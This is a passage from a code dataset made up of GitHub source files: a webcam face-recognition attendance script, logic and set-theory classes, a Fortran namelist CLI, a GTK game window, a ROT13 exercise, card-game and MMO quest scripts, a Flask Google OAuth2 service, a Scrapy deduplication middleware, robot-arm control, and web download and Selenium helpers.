encode1\nee=encode(i)\nprint(len(ee))\ncap=cv2.VideoCapture(0)\nwhile True:\n s,ii=cap.read()\n image=cv2.resize(ii,(0,0),None,0.25,0.25)\n image= cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n face=face_recognition.face_locations(image)\n encodeing=face_recognition.face_encodings(image,face)\n for ff,eee in 
zip(face,encodeing):\n        # compare_faces()/face_distance() take the list of known encodings first,\n        # then the single encoding detected in the current frame\n        m=face_recognition.compare_faces(ee,eee)\n        faced=face_recognition.face_distance(ee,eee)\n        print(faced)\n        match=n.argmin(faced)\n        print(match)\n        if m[match]: # only record attendance when the closest known face actually matches\n            n2=c[match].upper()\n            q.append(n2)\n            attendance(n2)\n\n\n\n\n","repo_name":"jonsnow120/ML_Attendance_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17174599488","text":"from ddq.taxonomy.node import Node, NodeRepr\nfrom ddq.topics.topic import Topic\nfrom ddq.topics.logics.topic import Logic\nfrom ddq.topics.logics.logic import Definition, Formulator, Term\nfrom ddq.topics.logics.logic import Function as LogicalFunction \nfrom ddq.util.check_type import check_type\n\n\nclass InductiveFormationFormulator(Formulator):\n    def __call__(self, *parameters) -> Node:\n        return InductiveFormation(*parameters)\n    \n    \nclass InductiveFormation(LogicalFunction):\n    def __init__(self, *in_children):\n        super().__init__()\n        self.set_children(in_children)\n    \n    def accepts_child(self, index: int, child: \"Node\") -> bool:\n        return check_type(child, Term)\n    \n    @staticmethod\n    def symbol() -> str:\n        return \"{}\"\n    \n    def repr_node(self) -> NodeRepr:\n        return self.symbol()\n\n\nclass InductionFormationDefinitionInductor(Definition):\n    def __init__(self, FOL: Logic, ST: Topic):\n        self._fol = FOL\n        self._st = ST\n\n    def create_definition_node(self, induction_length: int):\n        # bind the logic and topic handed to __init__ so the nested helpers can use them\n        FOL = self._fol\n        ST = self._st\n        def recurse_create_forall(count: int,\n                                  vars: VarBuilder, \n                                  index: int = 0) -> Node:\n            if index == count:\n                return None\n            else:\n                return FOL.Forall(\n                    vars.universal(\"u_{}\".format(index)),\n                    recurse_create_forall(count, vars, index+1))\n        def recurse_create_or(count: int,\n                              check_var: str,\n                              vars: VarBuilder, \n                              index: int = 0) -> Node:\n            eq_formula = FOL.Eq(vars[check_var], vars[\"u_{}\".format(index)])\n            if index + 1 == count:\n                return eq_formula \n            else:\n                return FOL.Or(\n                    eq_formula,\n                    recurse_create_or(count, check_var, vars, index+1))\n        # TBC continue here, we are just about re-adding the FOL quantifier to FOL\n        self._defined = (ST.InductiveFormation, [Term]*induction_length)\n        vars = VarBuilder()\n        root_member_foralls = recurse_create_forall(induction_length, vars)\n        tail_member_foralls = root_member_foralls\n        while tail_member_foralls.right() is not None:\n            tail_member_foralls = tail_member_foralls.right()\n        members = vars.values()\n        tail_member_foralls.set_right(\n            FOL.Forall(\n                vars.universal(\"Set\"),\n                FOL.Equiv(\n                    FOL.Eq(\n                        vars[\"Set\"],\n                        ST.InductiveFormation(induction_length, *members)\n                    ),\n                    FOL.Forall(\n                        vars.universal(\"x\"),\n                        FOL.Equiv(\n                            ST.In(vars[\"x\"], vars[\"Set\"]),\n                            recurse_create_or(induction_length, \"x\", vars)\n                        )\n                    )\n                )\n            )\n        )\n        self._formula = root_member_foralls\n\n    def __call__(self, *parameters) -> Node:\n        return self.create_definition_node(*parameters)\n\n\n","repo_name":"jadnohra/connect","sub_path":"proto_3/ddq/topics/set_theory/inductive_formation.py","file_name":"inductive_formation.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43107471903","text":"# -*- coding: utf-8 -*-\n\"\"\"Console script for f90nmlparse.\"\"\"\nimport os\nimport sys\nimport click\nimport logging\n\nfrom f90nmlparse.f90nmlparse import nmlparse, nmlwrite\nfrom f90nmlparse.utils import count_to_log_level\n\n__version__ = '0.1.0'\n\n\n@click.command()\n@click.option(\n    '--dry-run',\n    '-n',\n    flag_value='dry_run',\n    
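# click stores the string 'dry_run' when -n/--dry-run is passed, and the default otherwise\n    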
default=False,\n    help=\"Perform a trial run with no changes made\")\n@click.option(\n    '--verbose',\n    '-v',\n    count=True,\n    help=\"Increase verbosity (specify multiple times for more)\")\n@click.option('--version', '-V', is_flag=True, help=\"Print version\")\n@click.option('--format', '-f', help=\"Output format (json, nml or yaml)\")\n@click.option('--out_file', '-o', help=\"Output file\")\n@click.argument('infile', type=click.File('rb'), nargs=1)\ndef main(*args, **kwargs):\n    \"\"\"Parse a Fortran namelist and print it in different formats to an output file or to stdout\"\"\"\n\n    logging.basicConfig(level=count_to_log_level(kwargs['verbose']))\n\n    logging.warning(\"This is a warning.\")\n    logging.info(\"This is an info message.\")\n    logging.debug(\"This is a debug message.\")\n\n    if kwargs['version']:\n        click.echo(__version__)\n        return 0\n\n    if kwargs['dry_run']:\n        click.echo(\"Is dry run\")\n        return 0\n\n    if kwargs[\"out_file\"]:\n        output_file = kwargs[\"out_file\"]\n    else:\n        output_file = sys.stdout\n\n    # read input file name from command line\n    infile = kwargs[\"infile\"].name\n\n    mynml = nmlparse(infile)\n\n    if kwargs[\"format\"]:\n        output_fmt = kwargs[\"format\"]\n    else:\n        output_fmt = \"json\"\n\n    nmlwrite(mynml, _out=output_file, format=output_fmt)\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    sys.exit(main()) # pragma: no cover\n","repo_name":"MeteoSwiss-APN/f90nmlparse.old","sub_path":"src/f90nmlparse/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35959889044","text":"#Standard Python Imports\n#\n\n#Added Python Libraries\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk\n\n#Internal Imports\nfrom Enums import WinState\nfrom winInitial import WinInitial\nfrom mainGameWindow import MainGameWindow\nfrom newCharSheet import NewCharSheet\n\nclass MainWindow(Gtk.Window):\n\t#notebook - the notebook to handle the \"tabs\"\n\t#page_field - the page which contains the field of the game\n\t#page_sheets - the page which contains the character sheets of the game\n\t#state - the current state of the window\n\t#gdk_screen - the Gdk.Screen which holds the screen's settings\n\t#max_width\n\t#max_height\n\trpg_system = None #the RPG system type being played (set by winInitial after a game load)\n\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self)\n\t\tself.set_border_width(10)\n\n\t\t#getting window settings\n\t\tself.gdk_screen = Gdk.Screen.get_default()\n\t\tself.max_width = self.gdk_screen.get_width()\n\t\tself.max_height = self.gdk_screen.get_height()\n\n\t\tself.state = WinState(0).initial_state()\n\t\tself.buildWindow()\n\n\tdef buildWindow(self):\n\t\t##\n\t\t# Change the window according to the current state\n\t\t##\n\n\t\tif self.state == WinState.MAIN_PLAY:\n\t\t\t#clear the window if needed\n\t\t\tself.clear()\n\n\t\t\t#build the correct window\n\t\t\tMainGameWindow(self)\n\n\t\telif self.state == WinState.CHOOSE_GAME:\n\t\t\t#clear the window if needed\n\t\t\tself.clear()\n\n\t\t\t#build the correct window\n\t\t\tWinInitial(self)\n\t\telif self.state == WinState.NEW_CHAR:\n\t\t\t#clear the window if needed\n\t\t\tself.clear()\n\n\t\t\t#build the correct window\n\t\t\tNewCharSheet(self)\n\t\telse:\n\t\t\tpass\n\n\tdef clear(self):\n\t\t##\n\t\t# clear all the window's children, if there are any.\n\t\t##\n\n\t\tchildren = self.get_children()\n\t\tif children is not None:\n\t\t\tfor elem in children:\n\t\t\t\tif type(elem) == 
Gtk.Box:\n\t\t\t\t\tself.remove(elem)\n","repo_name":"davincif/RPGHelper","sub_path":"mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33824171614","text":"# JavaScript Algorithms and Data Structures Projects: Caesars Cipher\n#\n# One of the simplest and most widely known ciphers is a Caesar cipher, also known as a shift\n# cipher. In a shift cipher the meanings of the letters are shifted by some set amount. A common\n# modern use is the ROT13 cipher, where the values of the letters are shifted by 13 places.\n# Thus 'A' ↔ 'N', 'B' ↔ 'O' and so on. Write a function which takes a ROT13 encoded string as\n# input and returns a decoded string. All letters will be uppercase. Do not transform any\n# non-alphabetic character (i.e. spaces, punctuation), but do pass them on.\n#\n# rot13(str) ➞ str\n\n\ndef rot13(str):\n alphabet = \"\"\n for i in range(65, 91):\n alphabet += chr(i)\n ciphabet = alphabet[13 : len(alphabet)] + alphabet[0:13]\n return \"\".join([x if not x.isalpha() else ciphabet[alphabet.index(x)] for x in str])\n\n\nprint(rot13(\"LBH QVQ VG!\")) # ➞ \"YOU DID IT!\"\nprint(rot13(\"SERR PBQR PNZC\")) # ➞ \"FREE CODE CAMP\"\nprint(rot13(\"SERR CVMMN!\")) # ➞ \"FREE PIZZA!\"\nprint(rot13(\"SERR YBIR?\")) # ➞ \"FREE LOVE?\"\nprint(\n rot13(\"GUR DHVPX OEBJA SBK WHZCF BIRE GUR YNML QBT.\")\n) # ➞ \"THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG.\"\n\n# Notes\n#\n# A = 65\n# Z = 90\n# a = 97\n# z = 122\n","repo_name":"anthonyBosek/py-gorithms","sub_path":"projectAlgorithms/+Caesars Cipher/caesarsCipher.py","file_name":"caesarsCipher.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36351929707","text":"from love_letter.card import Card\n\n\nclass Baron(Card):\n\n input_instructions = \"Baron input instructions:\\n\" \\\n \"'card number-opponent number'\\n\" \\\n \"example: 1-2\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Baron\"\n self.score = 3\n self.description = \"Player will choose another player and privately compare hands.\" \\\n \" The player with the lower-strength hand is eliminated from the round.\"\n\n def execute_action(self, target):\n player_card = self.player.show_card()\n target_card = target.show_card()\n\n if player_card.score > target_card.score:\n target.is_active = False\n elif target_card.score > player_card.score:\n self.player.is_active = False","repo_name":"evbeda/games4","sub_path":"love_letter/cards/baron.py","file_name":"baron.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24696084275","text":"from flask import Flask\r\nfrom flask import render_template, make_response\r\nfrom flask_restful import Resource, Api, request\r\n\r\nfrom GoogleOAuth2Interface import GoogleOAuth2Interface\r\n\r\ngoogleOAuth2Interface = GoogleOAuth2Interface()\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\nclass Login(Resource):\r\n def get(self):\r\n chatid = request.args.get('chatid')\r\n apipsw = request.args.get('apipsw')\r\n return googleOAuth2Interface.login(chatid, apipsw)\r\n \r\n def post(self):\r\n chatid = request.get_json().get('chatid')\r\n apipsw = request.get_json().get('apipsw')\r\n return googleOAuth2Interface.login(chatid, apipsw)\r\n\r\nclass Oauth2Callback(Resource):\r\n def get(self):\r\n 
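# Google's authorization server redirects here with the anti-forgery 'state' and the one-time authorization 'code'\r\n        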
state = request.args.get('state')\r\n token = request.args.get('code')\r\n return googleOAuth2Interface.oauth2Callback(state, token)\r\n \r\n def post(self):\r\n request_json = request.get_json()\r\n state = request_json.get('state')\r\n token = request_json.get('code')\r\n return googleOAuth2Interface.oauth2Callback(state, token)\r\n\r\nclass GetCredentials(Resource):\r\n def get(self):\r\n chatid = request.args.get('chatid')\r\n apipsw = request.args.get('apipsw')\r\n return googleOAuth2Interface.getCredentials(chatid, apipsw)\r\n \r\n def post(self):\r\n chatid = request.get_json().get('chatid')\r\n apipsw = request.get_json().get('apipsw')\r\n return googleOAuth2Interface.getCredentials(chatid, apipsw)\r\n\r\napi.add_resource(Login, '/login')\r\napi.add_resource(Oauth2Callback, '/oauth2callback')\r\napi.add_resource(GetCredentials, '/getCredentials')\r\n\r\nif __name__ == '__main__':\r\n #app.run(debug=True, port=5001)\r\n app.run(debug=True, use_reloader=False, port=5001)","repo_name":"tomdan95/SDEtelegram-calendar-bot","sub_path":"GoogleOAuth2Interface/GoogleOAuth2Interface-main.py","file_name":"GoogleOAuth2Interface-main.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23898149578","text":"import sys\nreload(sys)\nsys.setdefaultencoding('UTF8')\nimport scrapy\n\nfrom preprocessing import HashVect\nfrom preprocessing import HTMLPreprocessing\nsys.path.append('SparseLSH-master/sparselsh/')\nfrom lsh import LSH\n\nclass DeduplicationMiddleware(object):\n\tdef process_spider_input(self,response, spider):\n\t\tcontent = HTMLPreprocessing(response.body).getText()\n\t\tfor object in self._lsh.query(self._hashvect.getVect(content),distance_func='cosine'):\n\t\t\tif float(object[1]) < self._dTrehold:\n\t\t\t\traise scrapy.exceptions.DropItem('Item has been identified as duplicate by LSH. 
Distance: ' + str(object[1]))\n\t\tself._lsh.index(self._hashvect.getVect(content),extra_data=response.url)\n\t\treturn None\n\n\tdef process_spider_output(self,response, result, spider):\n\t\treturn result\n\n\tdef process_spider_exception(self,response, exception, spider):\n\t\treturn None\n\n\tdef __init__(self,digest_length,num_hashtables,dTreshold): \n\t\tself._dTrehold = dTreshold\n\t\tself._lsh = LSH(digest_length,2**20,storage_config=None,num_hashtables=num_hashtables)\n\t\tself._hashvect = HashVect()\n\n\t@classmethod\n\tdef from_crawler(cls, crawler):\n\t\tif not crawler.settings.getint('DIGEST_LENGTH'):\n\t\t\traise scrapy.exceptions.NotConfigured('DIGEST_LENGTH missing')\n\t\tif not crawler.settings.getint('NUM_HASHTABLES'):\n\t\t\traise scrapy.exceptions.NotConfigured('NUM_HASHTABLES missing')\n\t\tif not crawler.settings.getfloat('DIST_TRESHOLD'):\n\t\t\traise scrapy.exceptions.NotConfigured('DIST_THRESHOLD missing')\n\n\t\tdigest_length = crawler.settings.getint('NUM_HASHTABLES')\n\t\tnum_hashtables = crawler.settings.getint('DIGEST_LENGTH')\n\t\tdTreshold = crawler.settings.getfloat('DIST_TRESHOLD')\n\n\t\text = cls(digest_length,num_hashtables,dTreshold)\n\t\treturn ext\n\n","repo_name":"stteffen58/scrapy-deduplication","sub_path":"deduplicationmiddleware/deduplicationmiddleware/spiders/deduplicationmiddleware.py","file_name":"deduplicationmiddleware.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36846370471","text":"import main_loop\n\n\n#initiate variables\nserial_port='/dev/ttyACM0' #'/dev/ttyACM1'\nimgdir=\"/home/pi/Desktop/Captures/\"\nimgprefix=\"CapF\"\n\n#initiate main loop\nloop=main_loop.main_loop(serial_port)\n\n\ndef RunTests():\n\n #Arm Movement Testing\n #loop.test_arm()\n #loop.test_arm_XYZ(5,5,-9)\n loop.test_arm_home()\n #loop.test_arm_home_plane()\n #loop.test_arm_clearcamera()\n\ndef RunPickandPlace():\n #Run Pick and Place\n \n fullscreen=False\n detectXYZ=True\n calculateXYZ=True\n move_arm=True\n loop.capturefromPiCamera(imgdir,imgprefix,fullscreen,detectXYZ,calculateXYZ,move_arm)\n\ndef ImageDetection():\n #Work on Image Detection (press ESC when done, Space to capture image)\n loop.test_arm_clearcamera()\n\n fullscreen=False\n #set detect XYZ to False when you want to use this loop to capture pictures (press spacebar)\n detectXYZ=True\n #set calculateXYZ to enable real world XYZ to be calculated\n calculateXYZ=True\n move_arm=False\n loop.capturefromPiCamera(imgdir,imgprefix,fullscreen,detectXYZ,calculateXYZ,move_arm)\n\n loop.test_arm_home()\n\n\n\n#RunTests()\n#RunPickandPlace()\nImageDetection()\n","repo_name":"pacogarcia3/hta0-horizontal-robot-arm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"53"} +{"seq_id":"36408788170","text":"# Made by Mr. Have fun! 
Version 0.2\n# Version 0.3 by H1GHL4ND3R\nimport sys\nfrom com.it.br import Config \nfrom com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"106_ForgottenTruth\"\n\nONYX_TALISMAN1, ONYX_TALISMAN2, ANCIENT_SCROLL, \\\nANCIENT_CLAY_TABLET, KARTAS_TRANSLATION, ELDRITCH_DAGGER \\\n= range(984,990)\n\nORC = 27070\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): \n JQuest.__init__(self,id,name,descr)\n self.questItemIds = [ONYX_TALISMAN1, ONYX_TALISMAN2, ANCIENT_SCROLL, ANCIENT_CLAY_TABLET, KARTAS_TRANSLATION]\n\n def onEvent (self,event,st) :\n htmltext = event\n if event == \"30358-05.htm\" :\n st.giveItems(ONYX_TALISMAN1,1)\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(self.SOUND_QUEST_START)\n return htmltext\n\n def onTalk (self,npc,player):\n npcId = npc.getNpcId()\n htmltext = self.NO_QUEST\n st = player.getQuestState(qn)\n if not st : return htmltext\n\n id = st.getState()\n if id == CREATED : # Check if is starting the quest\n st.set(\"cond\",\"0\")\n if player.getRace().ordinal() == 2 :\n if player.getLevel() >= 10 :\n htmltext = \"30358-03.htm\"\n else:\n htmltext = \"30358-02.htm\"\n st.exitQuest(1)\n else :\n htmltext = \"30358-00.htm\"\n st.exitQuest(1)\n elif id == COMPLETED : # Check if the quest is already made\n htmltext = self.QUEST_DONE\n else : # The quest itself\n try :\n cond = st.getInt(\"cond\")\n except :\n cond = None\n if cond == 1 :\n if npcId == 30358 :\n htmltext = \"30358-06.htm\"\n elif npcId == 30133 and st.getQuestItemsCount(ONYX_TALISMAN1) and id == STARTED : \n htmltext = \"30133-01.htm\"\n st.takeItems(ONYX_TALISMAN1,1)\n st.giveItems(ONYX_TALISMAN2,1)\n st.set(\"cond\",\"2\")\n elif cond == 2 :\n if npcId == 30358 :\n htmltext = \"30358-06.htm\"\n elif npcId == 30133 :\n htmltext = \"30133-02.htm\"\n elif cond == 3 :\n if npcId == 30358 :\n htmltext = \"30358-06.htm\"\n elif npcId == 30133 and st.getQuestItemsCount(ANCIENT_SCROLL) and st.getQuestItemsCount(ANCIENT_CLAY_TABLET) and id == STARTED :\n htmltext = \"30133-03.htm\"\n st.takeItems(ONYX_TALISMAN2,1)\n st.takeItems(ANCIENT_SCROLL,1)\n st.takeItems(ANCIENT_CLAY_TABLET,1)\n st.giveItems(KARTAS_TRANSLATION,1)\n st.set(\"cond\",\"4\")\n elif cond == 4 :\n if npcId == 30358 and st.getQuestItemsCount(KARTAS_TRANSLATION) :\n htmltext = \"30358-07.htm\"\n st.takeItems(KARTAS_TRANSLATION,1)\n st.giveItems(ELDRITCH_DAGGER,1)\n for item in range(4412,4417) :\n st.giveItems(item,int(10*Config.RATE_QUESTS_REWARD))\n st.giveItems(1060,int(100*Config.RATE_QUESTS_REWARD))\n if player.getClassId().isMage() and st.getInt(\"onlyone\") == 0:\n st.giveItems(2509,500)\n if player.getLevel() < 25 and player.isNewbie():\n st.giveItems(5790,3000)\n elif st.getInt(\"onlyone\") == 0:\n st.giveItems(1835,1000)\n st.unset(\"cond\")\n st.setState(COMPLETED)\n st.playSound(SOUND_QUEST_DONE)\n elif npcId == 30133 and id == STARTED :\n htmltext = \"30133-04.htm\"\n return htmltext\n\n def onKill(self,npc,player,isPet):\n st = player.getQuestState(qn)\n if not st : return\n if st.getState() != STARTED : return\n \n if st.getInt(\"cond\") == 2 :\n if st.getRandom(100) < 20 :\n if st.getQuestItemsCount(ANCIENT_SCROLL) == 0 :\n st.giveItems(ANCIENT_SCROLL,1)\n st.playSound(self.SOUND_ITEM_GET)\n elif st.getQuestItemsCount(ANCIENT_CLAY_TABLET) == 0 :\n st.giveItems(ANCIENT_CLAY_TABLET,1)\n st.playSound(self.SOUND_QUEST_MIDDLE)\n st.set(\"cond\",\"3\")\n return\n\nQUEST = 
Quest(106,qn,\"Forgotten Truth\")\nCREATED = State('Start', QUEST)\nSTARTING = State('Starting', QUEST)\nSTARTED = State('Started', QUEST)\nCOMPLETED = State('Completed', QUEST)\n\nQUEST.setInitialState(CREATED)\nQUEST.addStartNpc(30358)\n\nQUEST.addTalkId(30358)\n\nQUEST.addTalkId(30133)\n\nQUEST.addKillId(27070)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/quests/106_ForgottenTruth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"16215307830","text":"import sys\n\nmul = lambda: map(int, input().strip().split())\nseq = lambda: list(map(int, input().strip().split()))\nspl = lambda: input().strip().split()\nreadInt = lambda: int(input())\nreadLine = lambda: input().strip()\n\nsys.stdin = open(\"traffic.in\", \"r\")\nsys.stdout = open(\"traffic.out\", \"w\")\n\nn = readInt()\nl = []\nhighForward = 10**6\nlowForward = -10**6\nhighBack = 10**6\nlowBack = -10**6\n\nfor _ in range(n):\n l.append(spl())\n\nfor a in l:\n if a[0] == \"none\":\n highForward = min(highForward, int(a[2]))\n lowForward = max(lowForward, int(a[1]))\n if a[0] == \"on\":\n highForward += int(a[2])\n lowForward += int(a[1])\n if a[0] == \"off\":\n highForward -= int(a[1])\n lowForward -= int(a[2])\n\nfor a in reversed(l):\n if a[0] == \"none\":\n highBack = min(highBack, int(a[2]))\n lowBack = max(lowBack, int(a[1]))\n if a[0] == \"on\":\n highBack -= int(a[1])\n lowBack -= int(a[2])\n if a[0] == \"off\":\n highBack += int(a[2])\n lowBack += int(a[1])\n\nprint(max(0, lowBack), max(0, lowBack, highBack))\nprint(max(0, lowForward), max(0, lowForward, highForward))","repo_name":"adnaneaabbar/USACO-Guide","sub_path":"traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19166076473","text":"from typing import Dict, Optional, Tuple\r\n\r\ndef download_file(url, path=None, chunk_size=10**5, show_progress=True) -> str:\r\n\t''' Downloads a file keeping track of the progress. Returns the output path. 
'''\r\n\tfrom requests import get\r\n\tfrom simpler.format import human_seconds, human_bytes\r\n\tfrom sys import stdout\r\n\tfrom time import time\r\n\tif path is None: path = url.split('/')[-1]\r\n\tr = get(url, stream=True)\r\n\ttotal_bytes = int(r.headers.get('content-length'))\r\n\tbytes_downloaded = 0\r\n\tstart = time()\r\n\tif show_progress: print('Downloading %s (%s)' % (url, human_bytes(total_bytes)))\r\n\twith open(path, 'wb') as fp:\r\n\t\tfor chunk in r.iter_content(chunk_size=chunk_size):\r\n\t\t\tif not chunk: continue\r\n\t\t\tfp.write(chunk)\r\n\t\t\tif show_progress:\r\n\t\t\t\tbytes_downloaded += len(chunk)\r\n\t\t\t\tpercent = bytes_downloaded / total_bytes\r\n\t\t\t\tbar = ('█' * int(percent * 32)).ljust(32)\r\n\t\t\t\ttime_delta = time() - start\r\n\t\t\t\teta = human_seconds((total_bytes - bytes_downloaded) * time_delta / bytes_downloaded)\r\n\t\t\t\tavg_speed = human_bytes(bytes_downloaded / time_delta).rjust(9)\r\n\t\t\t\tstdout.flush()\r\n\t\t\t\tstdout.write('\\r %6.02f%% |%s| %s/s eta %s' % (100 * percent, bar, avg_speed, eta))\r\n\tif show_progress: print()\r\n\treturn path\r\n\r\nclass DownloaderPool:\r\n\r\n\tdef __init__(self, num_workers=100, download_method=None):\r\n\t\tself.num_workers = num_workers\r\n\t\tself.pending_urls = []\r\n\t\tself.responses = {}\r\n\t\tself.workers = None\r\n\t\tif download_method is None:\r\n\t\t\tfrom urllib.request import urlopen\r\n\t\t\tself.download_method = lambda url: urlopen(url, timeout=5).read()\r\n\t\telse:\r\n\t\t\tself.download_method = download_method\r\n\r\n\tdef spawn_workers(self):\r\n\t\tfrom threading import Thread\r\n\t\tself.workers = [Thread(target=self.download_worker) for _ in range(self.num_workers)]\r\n\t\t[w.start() for w in self.workers]\r\n\r\n\tdef download_worker(self):\r\n\t\tfrom traceback import print_exc\r\n\t\twhile len(self.pending_urls):\r\n\t\t\turl = self.pending_urls.pop()\r\n\t\t\ttry:\r\n\t\t\t\tres = self.download_method(url)\r\n\t\t\texcept:\r\n\t\t\t\tprint_exc()\r\n\t\t\t\tres = None\r\n\t\t\tself.responses[url] = res\r\n\r\n\tdef get(self, urls):\r\n\t\tself.pending_urls.extend(urls)\r\n\t\trequest_pending_urls = urls[:]\r\n\t\tself.spawn_workers()\r\n\t\twhile len(request_pending_urls):\r\n\t\t\tfor url in request_pending_urls:\r\n\t\t\t\tif url in self.responses:\r\n\t\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tcontinue\r\n\t\t\tyield url, self.responses[url]\r\n\t\t\tdel self.responses[url]\r\n\t\t\trequest_pending_urls.remove(url)\r\n\r\n_throttle_last = 0\r\ndef throttle(seconds: float = 1) -> None:\r\n\t''' Sleeps the thread so that the function is called every X seconds. 
'''\r\n\tglobal _throttle_last\r\n\tfrom time import sleep, time\r\n\tnow = time()\r\n\tremaining = _throttle_last + seconds - now\r\n\tif remaining > 0:\r\n\t\tsleep(remaining)\r\n\t\t_throttle_last += seconds\r\n\telse:\r\n\t\t_throttle_last = now\r\n\r\nclass Driver:\r\n\r\n\t_CONSOLE_LEVELS = 'debug', 'info', 'log', 'warn', 'error'\r\n\t_YEAR_SECONDS = 365.4 * 24 * 3600\r\n\t_WAIT_POLL_EACH = .1\r\n\r\n\tdef __init__(\r\n\t\tself, timeout: int = 3, keystroke_delay: int = .005, headless: bool = True, disable_flash: bool = True,\r\n\t\tdisable_images: bool = True, language: str = 'en-US, en', options: Dict[str, str] = None\r\n\t):\r\n\t\tfrom autoselenium import Firefox\r\n\t\tfrom selenium.webdriver.firefox.options import Options\r\n\t\topts = Options()\r\n\t\topts.set_preference('intl.accept_languages', language)\r\n\t\tif options is not None:\r\n\t\t\t[opts.set_preference(k, v) for k, v in options.items()]\r\n\t\tself.driver = Firefox(headless=headless, disable_flash=disable_flash, disable_images=disable_images, options=opts)\r\n\t\tself.timeout = timeout\r\n\t\tself.keystroke_delay = keystroke_delay\r\n\r\n\tdef browse(self, path: str):\r\n\t\tfrom selenium.webdriver.support.ui import WebDriverWait\r\n\t\tself.driver.get(path)\r\n\t\tWebDriverWait(self.driver, self.timeout).until(lambda d: d.execute_script('return document.readyState') == 'complete')\r\n\t\tself.driver.execute_script('window.CONSOLE_MESSAGES = [];%s' % ';'.join(\r\n\t\t\t'console.%s = (m) => CONSOLE_MESSAGES.push([\\'%s\\', m])' % (level, level)\r\n\t\t\tfor level in self._CONSOLE_LEVELS\r\n\t\t))\r\n\r\n\tdef wait(self, element: str, message: str = None, raise_errors: bool = True, invert: bool = False) -> bool:\r\n\t\tfrom selenium.common.exceptions import TimeoutException\r\n\t\tfrom selenium.webdriver.common.by import By\r\n\t\tfrom selenium.webdriver.support import expected_conditions as EC\r\n\t\tfrom selenium.webdriver.support.ui import WebDriverWait\r\n\t\ttry:\r\n\t\t\tif invert:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until_not(EC.presence_of_element_located((By.CSS_SELECTOR, element)))\r\n\t\t\telse:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until(EC.presence_of_element_located((By.CSS_SELECTOR, element)))\r\n\t\t\treturn True\r\n\t\texcept TimeoutException as e:\r\n\t\t\tif raise_errors:\r\n\t\t\t\tif message is None:\r\n\t\t\t\t\tmessage = 'Timeout waiting for element to disappear: ' if invert else 'Timeout waiting for element to appear: '\r\n\t\t\t\traise AssertionError(message + element) from e\r\n\t\treturn False\r\n\r\n\tdef wait_for_url(self, url: str, message: str = None, raise_errors: bool = True, invert: bool = False) -> bool:\r\n\t\tfrom selenium.common.exceptions import TimeoutException\r\n\t\tfrom selenium.webdriver.support import expected_conditions as EC\r\n\t\tfrom selenium.webdriver.support.ui import WebDriverWait\r\n\t\ttry:\r\n\t\t\tif invert:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until_not(EC.url_to_be(url))\r\n\t\t\telse:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until(EC.url_to_be(url))\r\n\t\t\treturn True\r\n\t\texcept TimeoutException as e:\r\n\t\t\tif raise_errors:\r\n\t\t\t\tif message is None:\r\n\t\t\t\t\tmessage = 'Timeout waiting for URL to not be: ' if invert else 'Timeout waiting for URL to be: '\r\n\t\t\t\traise AssertionError(message + url) from e\r\n\t\treturn False\r\n\r\n\tdef wait_for_file(self, path: str, message: str = 'Timeout waiting for file: ', raise_errors=True) -> bool:\r\n\t\tfrom os.path import exists\r\n\t\tfrom 
